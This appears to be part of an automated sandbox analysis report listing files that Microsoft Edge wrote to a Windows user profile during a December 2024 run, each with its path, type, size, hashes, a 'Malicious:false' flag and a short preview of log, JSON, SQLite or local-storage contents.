                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):327
                                                                                                                                                                                                                                                                              Entropy (8bit):5.121077658376117
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxnrQyq2PcNwi23oH+Tcwt8aPrqIFUt8IXfxnrG1Zmw+IXfxFc1RkwOcNwi230:RrQyvLZYebL3FUt86rg/+6Fc1R54ZYeo
                                                                                                                                                                                                                                                                              MD5:8CD6E7522D8E843316F11652BFDBF5C9
                                                                                                                                                                                                                                                                              SHA1:DF6DF79772BA69B8B9410E6D913BB028306B33C7
                                                                                                                                                                                                                                                                              SHA-256:0740B118CD56F832A3FC8C998EA8092AAD438CF04127002BFDB12B49597D1073
                                                                                                                                                                                                                                                                              SHA-512:5F22AA0064382D49442EF5CBBE6B3ACA3F7C46F065366D7314942648272093FA2C91FC111AC964A085DCC077D0037C1AA5ECFE2EED0A416ADECA030AF6C2C079
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.739 490 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/20-02:42:12.739 490 Recovering log #3.2024/12/20-02:42:12.740 490 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):327
                                                                                                                                                                                                                                                                              Entropy (8bit):5.121077658376117
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxnrQyq2PcNwi23oH+Tcwt8aPrqIFUt8IXfxnrG1Zmw+IXfxFc1RkwOcNwi230:RrQyvLZYebL3FUt86rg/+6Fc1R54ZYeo
                                                                                                                                                                                                                                                                              MD5:8CD6E7522D8E843316F11652BFDBF5C9
                                                                                                                                                                                                                                                                              SHA1:DF6DF79772BA69B8B9410E6D913BB028306B33C7
                                                                                                                                                                                                                                                                              SHA-256:0740B118CD56F832A3FC8C998EA8092AAD438CF04127002BFDB12B49597D1073
                                                                                                                                                                                                                                                                              SHA-512:5F22AA0064382D49442EF5CBBE6B3ACA3F7C46F065366D7314942648272093FA2C91FC111AC964A085DCC077D0037C1AA5ECFE2EED0A416ADECA030AF6C2C079
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.739 490 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/20-02:42:12.739 490 Recovering log #3.2024/12/20-02:42:12.740 490 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):331
                                                                                                                                                                                                                                                                              Entropy (8bit):5.163420189917638
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxfreVq2PcNwi23oH+Tcwt865IFUt8IXfxfregZmw+IXfxfreIkwOcNwi23oHY:RjeVvLZYeb/WFUt86jeg/+6jeI54ZYev
                                                                                                                                                                                                                                                                              MD5:007B7520BF5041043118B2F2B2C72A9C
                                                                                                                                                                                                                                                                              SHA1:7E68AE232D4E8CEFD51B29032900E98CA462ABAD
                                                                                                                                                                                                                                                                              SHA-256:FF81C054A11FC9451C6CDDA1062A66FC731EB5C95C578A7A5B73AFD614F5888F
                                                                                                                                                                                                                                                                              SHA-512:7FE5C8F7DE2978B7DEB219936AF3936716E67E9AB1AC8807F9CCAA753FB38563D0414B75727A2F8EDC718E3468A0B787ABD4C2A33ADAC3330A540C1F08F08CB1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.775 484 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/20-02:42:12.775 484 Recovering log #3.2024/12/20-02:42:12.775 484 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):331
                                                                                                                                                                                                                                                                              Entropy (8bit):5.163420189917638
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxfreVq2PcNwi23oH+Tcwt865IFUt8IXfxfregZmw+IXfxfreIkwOcNwi23oHY:RjeVvLZYeb/WFUt86jeg/+6jeI54ZYev
                                                                                                                                                                                                                                                                              MD5:007B7520BF5041043118B2F2B2C72A9C
                                                                                                                                                                                                                                                                              SHA1:7E68AE232D4E8CEFD51B29032900E98CA462ABAD
                                                                                                                                                                                                                                                                              SHA-256:FF81C054A11FC9451C6CDDA1062A66FC731EB5C95C578A7A5B73AFD614F5888F
                                                                                                                                                                                                                                                                              SHA-512:7FE5C8F7DE2978B7DEB219936AF3936716E67E9AB1AC8807F9CCAA753FB38563D0414B75727A2F8EDC718E3468A0B787ABD4C2A33ADAC3330A540C1F08F08CB1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.775 484 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/20-02:42:12.775 484 Recovering log #3.2024/12/20-02:42:12.775 484 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1254
                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                              MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                              SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                              SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                              SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                                                                              Entropy (8bit):5.164423642968304
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx7Vq2PcNwi23oH+Tcwt8NIFUt8IXfx7gZmw+IXfx7IkwOcNwi23oH+Tcwt8+Q:R7VvLZYebpFUt867g/+67I54ZYebqJ
                                                                                                                                                                                                                                                                              MD5:08798EC23147ED173472BC26212B6004
                                                                                                                                                                                                                                                                              SHA1:E7A19C8DD1B67ABC29C5868B3721578B1DCD8DA6
                                                                                                                                                                                                                                                                              SHA-256:5D6689C06012661510B9484510769EC87B8415169C207340D31AF7EB165F2291
                                                                                                                                                                                                                                                                              SHA-512:8903CFA60F70408CF89611C8F983B64ABEFB37F4EEA9E22E3819F1599BC805E2E6FCE9C281EF0FEDB5D009572080C9A7B23EB513BCBD8765F3CB28D58F5B7F6D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.438 1674 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/20-02:42:13.438 1674 Recovering log #3.2024/12/20-02:42:13.438 1674 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                                                                              Entropy (8bit):5.164423642968304
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx7Vq2PcNwi23oH+Tcwt8NIFUt8IXfx7gZmw+IXfx7IkwOcNwi23oH+Tcwt8+Q:R7VvLZYebpFUt867g/+67I54ZYebqJ
                                                                                                                                                                                                                                                                              MD5:08798EC23147ED173472BC26212B6004
                                                                                                                                                                                                                                                                              SHA1:E7A19C8DD1B67ABC29C5868B3721578B1DCD8DA6
                                                                                                                                                                                                                                                                              SHA-256:5D6689C06012661510B9484510769EC87B8415169C207340D31AF7EB165F2291
                                                                                                                                                                                                                                                                              SHA-512:8903CFA60F70408CF89611C8F983B64ABEFB37F4EEA9E22E3819F1599BC805E2E6FCE9C281EF0FEDB5D009572080C9A7B23EB513BCBD8765F3CB28D58F5B7F6D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.438 1674 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/20-02:42:13.438 1674 Recovering log #3.2024/12/20-02:42:13.438 1674 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):429
                                                                                                                                                                                                                                                                              Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                              MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                              SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                              SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                              SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):8720
                                                                                                                                                                                                                                                                              Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:K9hRtFlljq7A/mhWJFuQ3yy7IOWUKrhudweytllrE9SFcTp4AGbNCV9RUIBn:KTK75fO0hud0Xi99pEY/
                                                                                                                                                                                                                                                                              MD5:6FFCB8B81DA9524C8883489572DA4DDF
                                                                                                                                                                                                                                                                              SHA1:7DA62525AABFAD708544791D2FC86DC128C0CCAC
                                                                                                                                                                                                                                                                              SHA-256:202582DC7C2527B350F608CDE8EC371734D284D4BB87024B78F8ED96CD9BA9A3
                                                                                                                                                                                                                                                                              SHA-512:24B464F7EAA3FF6FBE7644D0F0E8DE9CF3C27247194107164E71416D6F7F8B28BCC18A0D97B66F1B2392AFC8E4AAC7F1FF31535481B9A1B5D5E60ED146AC53FE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...............\...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):115717
                                                                                                                                                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                              Entropy (8bit):3.648111512782986
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:aj9P0IJP/KbtRcoQkQerWjlfgam6IThj773pLLRKToaAu:ad1P/7oe2slejF7NRKcC
                                                                                                                                                                                                                                                                              MD5:8F653A338E5F799873BAF466EC18F473
                                                                                                                                                                                                                                                                              SHA1:CB972A1515232961D4866D2BD6996EA8745DEEDB
                                                                                                                                                                                                                                                                              SHA-256:2BF9654A33098743049460EF4C8F91F11C11C2BB9F7BAA357352DBBA6AB6CECD
                                                                                                                                                                                                                                                                              SHA-512:3D28899BD4EEED190F54320DBA5413DED6755C0BE294F02C76FE5FB55AB69E9BB46CE1FA9FDA98A63C5F2471A1EABFCD3FE5462B6A293D7B722D2AB7A99F9F19
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):414
                                                                                                                                                                                                                                                                              Entropy (8bit):5.299057700961188
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:RL/VvLZYeb8rcHEZrELFUt86Lsg/+6L/iSI54ZYeb8rcHEZrEZSJ:Z/5lYeb8nZrExg8Csk/lSoYeb8nZrEZe
                                                                                                                                                                                                                                                                              MD5:896047FFD4D85E647740FBEFE32244D5
                                                                                                                                                                                                                                                                              SHA1:DF02C13FB04BBE74C3D83CEF9E5F5E1BCCF713B0
                                                                                                                                                                                                                                                                              SHA-256:E3DC85BDC90B771683EB8BFB52757D9E00EEF38831EA3EDA50D4DD584FD86488
                                                                                                                                                                                                                                                                              SHA-512:0137FA15A348FEF3054974DB9336A0009F6BC7425C27179445C1C6307D87A178BC4F18E293BDFDE3E773BCD88AD3060CE86CD61932BB015A055CDD8987CA046F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:16.985 1674 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/20-02:42:16.986 1674 Recovering log #3.2024/12/20-02:42:16.987 1674 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):414
                                                                                                                                                                                                                                                                              Entropy (8bit):5.299057700961188
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:RL/VvLZYeb8rcHEZrELFUt86Lsg/+6L/iSI54ZYeb8rcHEZrEZSJ:Z/5lYeb8nZrExg8Csk/lSoYeb8nZrEZe
                                                                                                                                                                                                                                                                              MD5:896047FFD4D85E647740FBEFE32244D5
                                                                                                                                                                                                                                                                              SHA1:DF02C13FB04BBE74C3D83CEF9E5F5E1BCCF713B0
                                                                                                                                                                                                                                                                              SHA-256:E3DC85BDC90B771683EB8BFB52757D9E00EEF38831EA3EDA50D4DD584FD86488
                                                                                                                                                                                                                                                                              SHA-512:0137FA15A348FEF3054974DB9336A0009F6BC7425C27179445C1C6307D87A178BC4F18E293BDFDE3E773BCD88AD3060CE86CD61932BB015A055CDD8987CA046F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:16.985 1674 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/20-02:42:16.986 1674 Recovering log #3.2024/12/20-02:42:16.987 1674 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1660
                                                                                                                                                                                                                                                                              Entropy (8bit):5.645980676935876
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:4StZxTJ1v+XZ0bV03Sx4Lyls5BiyUL7AHHk2GJ341:4StrV1vEaD2osNdP1
                                                                                                                                                                                                                                                                              MD5:D55A89E1CBD24B7E5E39BB9A2B2E7DFC
                                                                                                                                                                                                                                                                              SHA1:52D053DA347EFF9D535DEF555A2FE3DE2E2AFFF5
                                                                                                                                                                                                                                                                              SHA-256:42AF659A7E0889D5F34D97343657AB989BCC78B9B76EBEEDAF42821373CDA7D7
                                                                                                                                                                                                                                                                              SHA-512:1CD1BD21BB8CF3CA802EF160B0F0CD31310CF2160195B691AB46D59D2C8CBA4A20797CA6C0735FE83C795D78DE7B7A83073DD2D9A340E3F590AB7790B681873D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...^9................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":754}.!_https://ntp.msn.com..LastKnownPV..1734680546970.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734680547971.._https://ntp.msn.com..MUID!.2FB26BEE4D14683625707EB54C6669DF.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734680547038,"schedule":[-1,30,-1,12,-1,25,-1],"scheduleFixed":[-1,30,-1,12,-1,25,-1],"simpleSchedule":[21,25,19,49,23,24,14]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734680546942.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241219.380"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_htt

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                                                                              Entropy (8bit):5.100952342317442
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxC3cM+q2PcNwi23oH+Tcwt8a2jMGIFUt8IXfx/JZmw+IXfxJcMVkwOcNwi234:RC3cM+vLZYeb8EFUt86/J/+6JcMV54Zo
                                                                                                                                                                                                                                                                              MD5:CC2504E0B54381C2D6F75AA47B3B71FE
                                                                                                                                                                                                                                                                              SHA1:3605FCD41AABA735CD56CC89501A5E23FAAE43F8
                                                                                                                                                                                                                                                                              SHA-256:05A8F2D5C870ECF303D0A9DD072F32C48A979BF0C09097224946A30BCB6EEBA4
                                                                                                                                                                                                                                                                              SHA-512:41079B23ADE4A9562FEEDBB9334350E27C9219B914612D5965D5F754FFB4C6997BB1212BD717AE9E958F6489D5E551486D3D684DE838C7F1BA83E8E517AE442E
                                                                                                                                                                                                                                                                              Malicious:false
